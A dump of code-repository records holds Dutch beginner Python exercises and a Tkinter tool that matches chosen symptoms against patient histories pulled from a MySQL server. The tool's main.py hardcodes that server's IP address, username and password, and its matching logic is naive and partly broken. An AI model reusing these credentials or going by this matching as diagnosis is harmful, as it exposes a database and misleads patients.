"language": "Python",
"length_bytes": 263,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 11,
"path": "/les 10/programming_3_ascii.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def code(invoerstring):\n invoerstrings = ''\n for i in invoerstring:\n ordening = ord(i)\n int(ordening)\n verschoven = ordening + 3\n letters = chr(verschoven)\n invoerstrings += letters\n print(invoerstrings)\n\ncode('RutteAlkmaarDen Helder')"
},
{
"alpha_fraction": 0.6074073910713196,
"alphanum_fraction": 0.6074073910713196,
"avg_line_length": 33,
"blob_id": "a94c38596f15b6871f6e8c716997875738744519",
"content_id": "a46f6a49974424f5de7bee719e32ca2e44c02c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 4,
"path": "/les5/programming_6_for_if_vowels.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "s = \"Guido van Rossum heeft programmeertaal Python bedacht.\"\nfor klinkers in s:\n if klinkers in ['a','e','i','o','u']:\n print(klinkers)"
},
{
"alpha_fraction": 0.46724891662597656,
"alphanum_fraction": 0.528384268283844,
"avg_line_length": 22,
"blob_id": "207c3ba554216798c8c5c4c8d4ec4d3074640d19",
"content_id": "ad1e3c9a886d8b0c36a1ea68181d3dd53e995c6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 10,
"path": "/les 7/programming_1_formatting.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def convert(celsius):\n fahrenheit = celsius * 1.8 + 32\n return fahrenheit\n\ndef table():\n print('{:2}F' '{:7}C'.format(' ',' '))\n for i in range (-30,41,10):\n print(('{:5}' '{:7}').format(convert(i),i))\n\ntable()"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5571428537368774,
"avg_line_length": 22.66666603088379,
"blob_id": "f201def90d7fb193af76d821bce8d0717283e911",
"content_id": "b8f72e4bdd5f2135836e114a00871e0307c2ecd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 3,
"path": "/les5/programming_5_for_if_numbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "for nummer in range(0,7):\n if nummer %2 == 0:\n print(nummer)"
},
{
"alpha_fraction": 0.6306695342063904,
"alphanum_fraction": 0.6393088698387146,
"avg_line_length": 24.72222137451172,
"blob_id": "2c89a05bbb07d3cf652bb073be8472c78df82f1a",
"content_id": "7dc07d98bf60479d716052dec3661f12dde9b93a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 18,
"path": "/Les 11/programming_1_catching_exceptions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "prijs=4356\ndef errorexcept():\n try:\n mensen = int(input('hoeveel mensen gaan er mee? '))\n antwoord= prijs / mensen\n\n print(antwoord)\n except ImportError:\n print('Negatieve getallen zijn niet toegestaan!')\n except ValueError:\n print('Gebruik cijfers voor het invoeren van het aantal!')\n except ZeroDivisionError:\n print(\"Delen door nul kan niet!\")\n except:\n print('Onjuiste invoer!')\n\n\nerrorexcept()\n"
},
{
"alpha_fraction": 0.6286919713020325,
"alphanum_fraction": 0.6329113841056824,
"avg_line_length": 22.799999237060547,
"blob_id": "5ed56260a602e2ea8cb6b97006b4540020a298b2",
"content_id": "26389f1531b920c6e4a3ef9987990f3b022ac8d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/les 7/programming_5_string_functions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "zin = input('Voer hier een willekeurige zin in: ')\n\ndef gemiddelde():\n total = 0\n currentline = zin.split(\" \")\n for i in currentline:\n total += len(i)\n return float(total) / float(len(currentline))\n\nprint(gemiddelde())"
},
{
"alpha_fraction": 0.5977011322975159,
"alphanum_fraction": 0.6283524632453918,
"avg_line_length": 28.11111068725586,
"blob_id": "14863fa110c53f8aefe294e6d24afa63a67318fb",
"content_id": "fa96db32a6bfd757ce4a60f7f79f9020f3ab0acb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 9,
"path": "/les6/programming_3_functie_met_if.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "lengte1 = float(input(\"Hoe lang ben je?(antwoord met bijv. 1.10): \"))\n\ndef lang_genoeg(lengte):\n if lengte1 > (lengte):\n print (\"Je bent lang genoeg voor deze attractie!\")\n else:\n print (\"Sorry, je bent te klein!\")\n\nlang_genoeg (float(1.20))"
},
{
"alpha_fraction": 0.5572916865348816,
"alphanum_fraction": 0.5729166865348816,
"avg_line_length": 23.125,
"blob_id": "685ff64307221d7d981da7f6612073859533e460",
"content_id": "3b93ac4c93c1833c5e79f9e999f4d3647a60ae33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 8,
"path": "/les 8/programming_2_lists_strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "lijst = eval(input(\"Geef lijst met minimaal 10 strings: \"))\ntotaal = []\nfor woord in lijst:\n if len(woord) <= 4:\n totaal.append(woord)\n print(totaal)\n\n #word, end = ' '"
}
] | 43 |
Kildsforkids/prediction | https://github.com/Kildsforkids/prediction | 0be56df76fe5555e186bc4100a5cc8a636fbdeec | 98aa84e7930d696ee1447248ddebeb12a16e0b2a | c4c990e546bf0fe9ca72edc0fd80cf30a4444ec2 | refs/heads/master | 2020-04-18T22:09:41.600951 | 2019-05-15T02:41:22 | 2019-05-15T02:41:22 | 167,785,747 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5714197754859924,
"alphanum_fraction": 0.580050528049469,
"avg_line_length": 34.494529724121094,
"blob_id": "2a22db1759c2132ccb12488ed6b6ba8398f5f857",
"content_id": "87e0244a2dedfa39a0cbc32e71b8ea7ba659a055",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19466,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 457,
"path": "/main.py",
"repo_name": "Kildsforkids/prediction",
"src_encoding": "UTF-8",
"text": "from tkinter import Tk, Frame, Listbox, Scrollbar, Toplevel, Message, \\\n StringVar, IntVar, Spinbox, Button, OptionMenu, Checkbutton\nimport json\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport translations\nimport pandas as pd\n\n# !!!ОСТОРОЖНО!!! ДАЛЬШЕ ИДУТ КОСТЫЛИ |\n# V\ncount = 0\nwindow_count = 0\n# Функция соединения с БД\ndef connect(host, user, password, database, port):\n connection = None\n try:\n # Пытаемся установить соединение\n connection = mysql.connector.connect(user=user, password=password,\n host=host, database=database,\n port=port)\n except mysql.connector.Error as err:\n # Если неверны данные для подключения\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n # Если БД не существует\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n # Другие виды ошибок\n else:\n print(err)\n # При успешном подключении\n else:\n print(\"You are connected!\")\n # Возвращает None\n return connection\n\n\n# Функция записи в JSON-файл\ndef json_write(file, data):\n # Открываем файл на запись\n with open(file, \"w\") as write_file:\n # Записываем данные\n json.dump(data, write_file)\n # Закрываем файл\n write_file.close()\n\n\n# Функция считывания из JSON-файла\ndef json_read(file):\n # Открываем файл на чтение\n with open(file, \"r\") as read_file:\n # Считываем данные\n data = json.load(read_file)\n # Закрываем файл\n read_file.close()\n # Возвращаем данные\n return data\n\n\n# Функция записи данных из БД в JSON-файл\ndef load(connection):\n # Устанавливаем курсор для SQL-запросов\n cursor = connection.cursor()\n # Получаем результат по отправленному SQL-запросу\n cursor.execute(\"select * from directory;\")\n # Получаем список атрибутов\n atr_list = [i[0] for i in cursor.description]\n # Создаем пустой список для историй болезней\n data = []\n # Перенос записей из БД в data с непустыми атрибутами\n for row in cursor:\n # Добавляем словарь (для записи - атрибут: значение - из БД)\n data.append({})\n # Заводим индекс для перехода к атрибуту с непустым значением\n k = 0\n # Пробегаемся по столбцам и добавляеи записи в словаре -\n # атрибут: значение\n for col in row:\n # Если значение есть\n if col is not None:\n # Обнволяем пары - атрибут: значение -\n # в последнем словаре списка\n data[len(data)-1].update({atr_list[k]: col})\n # Увеличиваем индекс\n k += 1\n # Закрываем подключение к БД\n connection.close()\n # Приводим строковые значения к стандартному виду\n for history in data:\n for key in history:\n # Если не из диагноза и пола\n if key != 'diagnose' and key != 'sex':\n # Если тип значения - строка\n if type(history[key]) is str:\n # Если строка состоит только из целого числа\n if history[key].isdigit():\n # Привести строку к целому числу\n history[key] = int(history[key])\n else:\n # Привести строку к нижнему регистру, без пробелов,\n # ё = е\n history[key] = history[key].lower().replace(' ', ''). 
\\\n replace('ё', 'е')\n # Запись из data в JSON-файл\n json_write(\"local_db.json\", data)\n # Удаляем ненужные атрибуты из списка\n atr_list.remove('id')\n atr_list.remove('diagnose')\n # Сохраняем список атрибутов в JSON-файле\n json_write(\"attributes.json\", atr_list)\n\n\n# Функция заполнения списка словарями - {атрибут, виджет, значения}\ndef create_fields_list():\n global fields, atr_list\n\n # Список атрибутов и их возможных значений\n fields = []\n # Получаем список атрибутов\n atr_list = json_read(\"attributes.json\")\n # Получаем данные (истории болезней)\n data = json_read(\"local_db.json\")\n # Для каждого атрибута\n for atr in atr_list:\n # Создаем в списке словарь\n fields.append({})\n # Список значений (если строковые, то для выпадающего меню,\n # если числовые, то для запоминания последнего введенного значения)\n values = []\n # По умолчанию виджет - SpinBox (числовое поле)\n widget_type = 'spinbox'\n # Для каждой истории болезни\n for history in data:\n # Если есть такой атрибут\n if history.get(atr) is not None:\n # Если значение атрибута - строка\n if type(history[atr]) is str:\n # Если такой строки еще нет\n if history[atr] not in values:\n # Добавить строку в список значений\n # для выпадающего списка (OptionMenu)\n values.append(history[atr])\n # Тип виджета - OptionMenu (выпадающий список)\n widget_type = 'option'\n # Если значение атрибута - целое число\n elif type(history[atr]) is int:\n # Если атрибут - не возраст\n if atr != 'age':\n # Тип виджета - CheckButton (окно с галочкой)\n widget_type = 'checkbutton'\n break\n # Если значение атрибута - вещественное число\n elif type(history[atr]) is float:\n # Тип виджета - SpinBox\n # (числовое поле для вещественных чисел)\n widget_type = 'spinbox_float'\n break\n else:\n break\n # Записать словарь\n # {'atr': название атрибута,\n # 'widget': тип виджета,\n # 'values': значения атрибута\n # } в список словарей\n fields[len(fields)-1].update({'atr': atr})\n fields[len(fields)-1].update({'widget': widget_type})\n fields[len(fields)-1].update({'values': values})\n\n\n# Проверка на минимальное количество выбранных атрибутов для доступа к анализу\ndef check_outputbox():\n # Если атрибутов >= чем минимальное\n if outputbox.size() >= weight_min_value:\n # Сделать активной кнопку \"Анализировать\"\n weigh_btn['state'] = 'normal'\n else:\n # Сделать неактивной кнопку \"\"Анализировать\n weigh_btn['state'] = 'disabled'\n\n\n# Функция обновления списка выбранных атрибутов\ndef outputbox_refresh():\n # Очистить список выбранных атрибутов перед записью\n outputbox.delete(0, outputbox.size()-1)\n for atr in check:\n # Проверка на наличие перевода названия атрибута\n if translations.get(atr) is not None:\n # Перевести название атрибута и добавить\n # в список выбранных атрибтов для сравнения\n outputbox.insert('end', translations[atr]+' - '+str(check[atr]))\n else:\n # Добавить атрибут без перевода\n outputbox.insert('end', atr+' - '+str(check[atr]))\n # Проверить на минимальное количество выбранных атрибутов\n check_outputbox()\n\n\n# Функция записи атрибута в список атрибутов сравнения\ndef remember():\n widget = \"\"\n attribute = \"\"\n # Если есть выбранный ранее атрибут\n if 'last_selected' in globals():\n if len(last_selected) > 0:\n widget = last_selected['widget']\n attribute = last_selected['atr']\n # Запомнить значение атрибута из его виджета\n if widget == 'spinbox':\n string = spin.get()\n # Ограничить ввод целого числа до 200\n if string.isdigit() and int(string) <= 200:\n check.update({attribute: int(string)})\n 
last_selected['values'].clear()\n last_selected['values'].append(string)\n elif widget == 'option':\n check.update({attribute: option_value.get()})\n elif widget == 'checkbutton':\n # Конвертация 1 и 0 в 'да' и 'нет'\n check.update({\n attribute: 'да' if checkbutton_value.get() else 'нет'\n })\n last_selected['values'].clear()\n last_selected['values'].append(checkbutton_value.get())\n elif widget == 'spinbox_float':\n string = spin.get()\n can = True\n try:\n float(string)\n except ValueError:\n can = False\n if can:\n check.update({attribute: float(string)})\n last_selected['values'].clear()\n last_selected['values'].append(string)\n # Обновить список выбранных атрибутов\n outputbox_refresh()\n\n\n# Функция удаления атрибута из списка атрибутов сравнения\ndef forget():\n # Получаем текущий выбранный элемент\n ocs = outputbox.curselection()\n # Если есть выбранный элемент\n if len(ocs) > 0:\n # Получаем индекс\n id = lbox.get(0, 'end').index(outputbox.get(ocs).split(' -')[0])\n del check[fields[id]['atr']]\n outputbox_refresh()\n\n\n# Функция удаления всех атрибтов из списка атрибутов сравнения\ndef forget_all():\n check.clear()\n outputbox_refresh()\n\n\n# Функция создания выпадающего списка (OptionMenu)\ndef create_optionmenu():\n global option, option_value\n\n option_value = StringVar(value=last_selected['values'][0])\n option = OptionMenu(root, option_value, *last_selected['values'])\n option.place(relx=0.5, rely=0.5, anchor='center')\n\n\n# Функция создания виджета для выбранного атрибута\ndef create_widget():\n if last_selected['widget'] == 'option':\n create_optionmenu()\n elif last_selected['widget'] == 'spinbox' or \\\n last_selected['widget'] == 'spinbox_float':\n if len(last_selected['values']) > 0:\n spin_value.set(last_selected['values'][0])\n else:\n spin_value.set('0')\n spin.place(relx=0.5, rely=0.5, anchor='center')\n elif last_selected['widget'] == 'checkbutton':\n if len(last_selected['values']) > 0:\n checkbutton_value.set(last_selected['values'][0])\n else:\n checkbutton_value.set(0)\n checkbutton.place(relx=0.5, rely=0.5, anchor='center')\n\n\n# Функция вывода всплывающих сообщений\ndef show_msg(title, text):\n global popup, window_count\n\n if window_count > 0: close_window()\n popup = Toplevel()\n popup.title(title)\n popup.protocol(\"WM_DELETE_WINDOW\", close_window)\n msg = Message(popup, text=text)\n msg.pack()\n window_count += 1\n\n\ndef close_window():\n popup.destroy()\n\n\n# Функция выбора атрибута\ndef select(event):\n global last_selected, count\n # Если есть текущий выбранный атрибут\n if len(lbox.curselection()) > 0:\n # Записать атрибут как ранее выбранный\n last_selected = fields[lbox.curselection()[0]]\n # Очистить место от предыдущих виджетов\n spin.place_forget()\n if count > 0:\n option.place_forget()\n checkbutton.place_forget()\n if last_selected['widget'] == 'option':\n count += 1\n # Установить виджет для соответствующего атрибута\n create_widget()\n\n\n# Функция анализа\ndef weigh():\n weights = {}\n # Считываем в data данные из JSON-файл\n data = json_read(\"local_db.json\")\n for history in data:\n k = 0\n for attribute in check:\n if history.get(attribute) is not None:\n\t\t\t\tif type(check[attribute]) is float:\n\t\t\t\t\tif check[attribute] >= history[attribute]-5 and check[attribute] <= history[attribute]+5:\n\t\t\t\t k += 1\n elif check[attribute] == history[attribute]:\n k += 1\n elif check[attribute] == 'да':\n if history[attribute] == 1:\n k += 1\n elif check[attribute] == 'нет':\n if history[attribute] == 0:\n k += 1\n hd = 
history['diagnose']\n if hd not in weights:\n weights.update({hd: [0, 0, []]})\n w = weights[hd]\n if k > 0:\n w[1] += 1\n w[0] = k if k > w[0] else w[0]\n w[2].append(history)\n weights.update({hd: [w[0], w[1], w[2]]})\n # Вывод результатов в отдельном окне\n text = \"\"\n dfs = []\n weights = sorted(weights.items(), key=lambda item: item[1])\n for weight in reversed(weights):\n if weight[1][0] >= weight_min_value and \\\n weight[1][1] >= weight_min_value:\n for dictionary in weight[1][2]:\n df = pd.DataFrame(dictionary, index=[0])\n dfs.append(df)\n text += '\\n'+weight[0]+'\\n\\tМаксимум совпадений: '+str(weight[1][0])+'\\nЛюдей с похожими признаками: ' + \\\n str(weight[1][1])+'\\n'\n if text == \"\":\n text = \"Мало критериев!\"\n show_msg(\"Результат\", text)\n df2 = pd.concat(dfs)\n df0 = dfs[0].to_dict()\n cols = list(df0.keys())\n df2 = df2[cols]\n\n df2.to_csv(\"test.csv\", sep='\\t', encoding='cp1251')\n\n\n# Функция создания интерфейса\ndef main():\n global lbox, outputbox, spin, spin_value, window_width, window_height, \\\n checkbutton_value, checkbutton, root, weigh_btn\n\n window_width = 800\n window_height = 600\n listbox_width = window_width // 17\n\n root = Tk()\n root.title('Мед-Анализатор 3000')\n root.geometry(str(window_width)+'x'+str(window_height))\n root.minsize(window_width, window_height)\n root.maxsize(window_width, window_height)\n root.bind('<Return>', lambda event: remember())\n # root.protocol(\"WM_DELETE_WINDOW\", close_window)\n\n frame = Frame(root)\n frame2 = Frame(root)\n frame.pack(side='left')\n frame2.pack(side='right')\n\n lbox = Listbox(frame, width=listbox_width, height=window_height)\n lbox.pack(side='left', fill=\"y\")\n for atr in atr_list:\n if translations.get(atr) is not None:\n lbox.insert('end', translations[atr])\n else:\n lbox.insert('end', atr)\n lbox.bind('<<ListboxSelect>>', select)\n lbox.bind('<Double-1>', lambda event: remember())\n\n outputbox = Listbox(frame2, width=listbox_width, height=window_height)\n outputbox.pack(side='right', fill=\"y\")\n outputbox.bind('<Double-1>', lambda event: forget())\n\n scrollbar = Scrollbar(frame, orient=\"vertical\")\n scrollbar.config(command=lbox.yview)\n scrollbar.pack(side='right', fill=\"y\")\n\n scrollbar2 = Scrollbar(frame2, orient=\"vertical\")\n scrollbar2.config(command=outputbox.yview)\n scrollbar2.pack(side='left', fill=\"y\")\n\n spin_value = StringVar(value='0')\n spin = Spinbox(root, from_=0, to=200, textvariable=spin_value, width=5,\n format=\"%.2f\")\n checkbutton_value = IntVar()\n checkbutton = Checkbutton(text=\"Есть\", variable=checkbutton_value,\n onvalue=1, offvalue=0)\n\n btn = Button(root, text=\"Запомнить\", command=remember)\n btn.pack()\n\n btn = Button(root, text=\"Удалить\", command=forget)\n btn.pack()\n\n btn = Button(root, text=\"Удалить все\", command=forget_all)\n btn.pack()\n\n weigh_btn = Button(root, text=\"Анализировать\", state='disabled',\n padx=5, pady=5, command=weigh)\n weigh_btn.pack(side='bottom')\n\n root.mainloop()\n\n\nif __name__ == '__main__':\n global check, fields, translations, atr_list, weight_min_value\n\n # Словарь для перевода\n translations = translations.get_translation('ru')\n # Словарь атрибутов сравнения\n check = {}\n # Минимальное необходимое число для критериев Max и People\n weight_min_value = 5\n # Попытка подключения к БД\n connection = connect('62.249.154.246', 'medic', 'medlab', 'diagmed', 33547)\n # Если удалось подключиться\n if connection is not None:\n # Загрузить данные в JSON-файл\n load(connection)\n # Заполнение 
fields атрибутами и соответстующими им значениями и виджетами\n create_fields_list()\n # Запуск интерфейса\n main()\n"
},
{
"alpha_fraction": 0.7704523801803589,
"alphanum_fraction": 0.7820019125938416,
"avg_line_length": 55.16216278076172,
"blob_id": "22c460295ed7950d74b3f2151ccda28f5ffa484a",
"content_id": "c6594a3f051a07f34d05af74184fd2b451b490a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3548,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 37,
"path": "/README.md",
"repo_name": "Kildsforkids/prediction",
"src_encoding": "UTF-8",
"text": "# prediction\nProgram that will help to diagnose diseases\n\n#5 (последние изменения):\n - Кнопка \"Анализировать\" активна от 5 выбранных атрибутов\n - Главное окно теперь фиксированного размера (800x600)\n - Попытка добавить ввод вещественных чисел в Spinbox\n - При загрузке данных из БД исправляются ошибки в значениях атрибутов (строки без пробелов, приведены к нижнему регистру, ё = е, восстановлены числа из строк)\n - Попытка добавить комментарии к коду\n\n#4:\n - Добавлены функции для работы с JSON-файлами\n - Установлен минимальный размер главного окна (800x600)\n - Значения таких виджетов как Spinbox и Checkbutton теперь сохраняются индивидуально для каждого соответствующего атрибута\n - Заменены значения 1 и 0 для Checkbutton на \"есть\" и \"нет\" соответственно\n - Добавлена кнопка \"Удалить все\"\n - Если недостаточно совпадений для выдачи хотя бы 1 результата, выводит \"Мало критериев\" (вместо пустого поля)\n - Добавлена проверка на некорректный ввод в Spinbox (в том числе и на отрицательное значение)\n - При нажатии на клавишу \"Enter\" (\"Ввод\") теперь запоминается значение из виджета для текущего атрибута\n - При нажатии на клавишу \"Space\" (\"Пробел\") теперь выводится результат\n\n#3:\n - Результат отсортирован по типу: сначала максимальное количество совпавших атрибутов (Max), затем количество всех историй, в которых совпал хоть один атрибут (People)\n - Критерий для выбора диагнозов изменен с >= 3 до >= 5 для Max и People\n\n#2:\n - Добавлена кнопка удаления выбранных элементов из списка\n - Словарь переводов выведен в отдельный файл\n - Программа, загрузив данные из БД, теперь может работать автономно, используя локальные хранилища данных\n - Реакция списков на двойной клик, привязка к добавлению и удалению выбранных атрибутов соответственно\n\n#1:\n - Автоматическое заполнение значений для выбра к соответсвующим атрибутам типа \"строка\"\n - Добавлен список выбранных атрибутов для сравнения\n - Добавлен словарь для перевода названий атрибутов\n - Добавлен критерий >= 3 max кол-ва совпадений атрибутов для одной истории болезни\n - Добавлены комментарии\n"
},
{
"alpha_fraction": 0.5551839470863342,
"alphanum_fraction": 0.5551839470863342,
"avg_line_length": 45.39655303955078,
"blob_id": "730c51f2c0f9e8429242269085e3ead5a149f2d0",
"content_id": "de5a71e914df4eccbb8494a2fdfe4e6a8712213f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3452,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 58,
"path": "/translations.py",
"repo_name": "Kildsforkids/prediction",
"src_encoding": "UTF-8",
"text": "def get_translation(name):\n # Словарь для перевода\n if name == 'ru':\n return {\n 'sex': 'Пол',\n 'age': 'Возраст',\n 'tongue': 'Налет на языке',\n 'stomach': 'Живот',\n 'gallbladder_size': 'Желчный пузырь: размер',\n 'gallbladder_form': 'Желчный пузырь: форма',\n 'gallbladder_wall_thickness': 'Желчный пузырь: толщина стенок',\n 'gallbladder_bending': 'Желчный пузырь: изгиб',\n 'gallbladder_uniformity_of_walls':\n 'Желчный пузырь: однородность стенок',\n 'gallbladder_visibility_of_stones':\n 'Желчный пузырь: видимость камней',\n 'gallbladder_lumen_of_bladder': 'Желчный пузырь: просвет пузыря',\n 'pancreas_cysts': 'Поджелудочная: кисты',\n 'pancreas_contours': 'Поджелудочная: контуры',\n 'pancreas_structure': 'Поджелудочная: структура',\n 'pancreas_thickness_of_head': 'Поджелудочная: толщина головки',\n 'pancreas_length_of_body': 'Поджелудочная: длина тела',\n 'pancreas_echogenicity_of_parenchyma':\n 'Поджелудочная: эхогенность паренхимы',\n 'pancreas_duct_width': 'Поджелудочная: длина хвоста',\n 'FGDS_color': 'ФГДС: цвет',\n 'FGDS_deffects': 'ФГДС: деффекты',\n 'FGDS_walls_mucus': 'ФГДС: стенки, слизь',\n 'FGDS_walls': 'ФГДС: стенки',\n 'FGDS_cardia_closes': 'ФГДС: кардия смыкается',\n 'nausea': 'Тошнота',\n 'pain_upper_abdomen': 'Боли в верхнем отделе живота',\n 'upper_quadrant_pain_left': 'Боли в левом подреберье',\n\t\t\t'upper_quadrant_pain_right': 'Боли в правом подреберье',\n 'vomiting': 'Рвота',\n 'abdominal_distention': 'Вздутие живота',\n 'pain_on_palpation': 'Боль при пальпации',\n 'participation_of_breathing': 'Участие живота в акте дыхания',\n 'eructation': 'Отрыжка',\n 'heartburn': 'Изжога',\n 'weight_loss': 'Снижение массы тела',\n 'SOE': 'СОЭ',\n 'amylase': 'Амилаза',\n 'pancreatic_amylase': 'Панкреатическая амилаза',\n 'lipase': 'Липаза',\n 'trypsin': 'Трипсин',\n 'direct_bilirubin': 'Билирубин прямой',\n 'total_bilirubin': 'Билирубин общий',\n 'alkaline_phosphatase': 'Щелочная фосфатаза',\n 'erythrocytes': 'Эритроциты',\n 'hemoglobin': 'Гемоглобин',\n 'hematocrit': 'Гематокрит',\n 'lymphocytes': 'Лимфациты',\n 'neutrophils': 'Нейтрофилы',\n 'platelets': 'Тромбоциты',\n 'leukocytes': 'Лейкоциты'\n }\n return {}\n"
}
] | 3 |
benjavalero/phoshare | https://github.com/benjavalero/phoshare | 3c22f06b36596946f87befd1296f4f76274e76fe | 35273c19d791a5f7abd73ea143a1d7eb0ff7d57a | 259327455bab6eed977eb25308bf7f82a4611a74 | refs/heads/master | 2021-04-28T23:28:26.824579 | 2017-01-18T18:56:32 | 2017-01-18T18:56:32 | 77,703,881 | 0 | 0 | null | 2016-12-30T18:40:52 | 2015-11-08T15:33:14 | 2015-05-07T04:58:20 | null | [
{
"alpha_fraction": 0.6883116960525513,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 37.5,
"blob_id": "67e3fa6afc1324b6cf3fd8cc5de6ac2547dc272a",
"content_id": "d008ef9bd815cc4a34633a16d6333a145c179d5d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 2,
"path": "/phoshare/phoshare_version.py",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
"text": "\"\"\"Phoshare version information.\"\"\"\nPHOSHARE_VERSION = 'Phoshare 2.0.0 BETA'\n"
},
{
"alpha_fraction": 0.7623132467269897,
"alphanum_fraction": 0.7703375816345215,
"avg_line_length": 64.70909118652344,
"blob_id": "a44bb9e4424e432cd2359c81bb5729168b7be5a4",
"content_id": "a09bca84c671445a964f8b1b1e63562fdb07f2e0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3614,
"license_type": "permissive",
"max_line_length": 557,
"num_lines": 55,
"path": "/README.md",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
"text": "# Notice\n\nAfter Apple's discontinuation of iPhoto in favor of the new Photos app, I have made a fork of phoshare and adapted it so it can work with Photos.\n\n# Overview\n\n`phoshare` allows you to export and synchronize your Photos library to a folder tree. It preserves both the original and modified image, your folder and album organization, and applies your Photos titles, descriptions, keywords, face tags, face rectangles, places, and ratings to the IPTC/EXIF metadata of your images. You can export a full copy of your library, or just build a tree of linked images that require very little additional disk space. You can re-run `phoshare` at any time to synchronize any changes made in Photos to your export tree quickly.\n\n[Dan Warne](http://danwarne.com/) wrote a blog post on [how to back up your iPhoto library to Dropbox](http://danwarne.com/backup-iphoto-library-dropbox-resize-images-save-space-2/) with `phoshare`.\n\n`phoshare` is written in Python, and is easily customizable by just editing the Python scripts.\n\nThis fork is intended to revive `phoshare` as the original author [discontinued development](https://groups.google.com/forum/?fromgroups=#!topic/phoshare-users/moWsMcD5SdQ) in late 2012. It's meant for use with the latest version of Photos (1.0.1 as of this writing). For any version of iPhoto or Aperture, please use an earlier version from the original [project](https://code.google.com/p/phoshare/downloads/list).\n\n# TO-DO\n\nThe adaptation to Photos library is still in progress, although the main features already work. Please take into account there is no documentation available about the Photos library structure, all of it has been figured out by reverse-engineering.\n\nThere still some disabled features and possible issues:\n\n- [ ] Make script to generate an OS X app\n- [ ] Export also the images hanging from the root album.\n- [ ] Enable metadata export.\n- [ ] Enable face albums export, in case these stil exist.\n- [ ] Fix Python PEP8 and Code Inspections.\n- [ ] Clean-up entirely the code once the old features are all restored or completely discarded.\n- [ ] Fix issue if the Photos library path contains non-Ascii characters.\n- [ ] Fix issue if the export path contains non-Ascii characters.\n- [ ] Fix issue if any export filter contains non-Ascii characters.\n- [ ] When exporting try to keep in the filesystem to file dates equal to the image date.\n- [ ] Test what happens when importing to Photos an old image without metadata, and thus with no image date.\n- [ ] Test the current behaviour when exporting metadata (when enabled) if the export file is a hard link.\n- [ ] Adapt to newer version of Photos 2.0.0.\n\n# Documentation\n\nFor now, use the original [Documentation](https://sites.google.com/site/phosharedoc) link for \"How To\" information, and the [user group](http://groups.google.com/group/phoshare-users) for additional information. 
I will update the documentation for the fork as time permits.\n\n# License\n\nOriginal work Copyright 2010 Google Inc.\nModified work Copyright 2014 Luke Hagan\nModified work Copyright 2017 Benjamín Valero\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n"
},
{
"alpha_fraction": 0.5910133719444275,
"alphanum_fraction": 0.60550457239151,
"avg_line_length": 40.52381134033203,
"blob_id": "b577fb9f07e1a61107f07db0e2089e31e0e387ed",
"content_id": "6be595f3309f8413d7b1127b55a066eea91740c2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9592,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 231,
"path": "/appledata/applexml.py",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
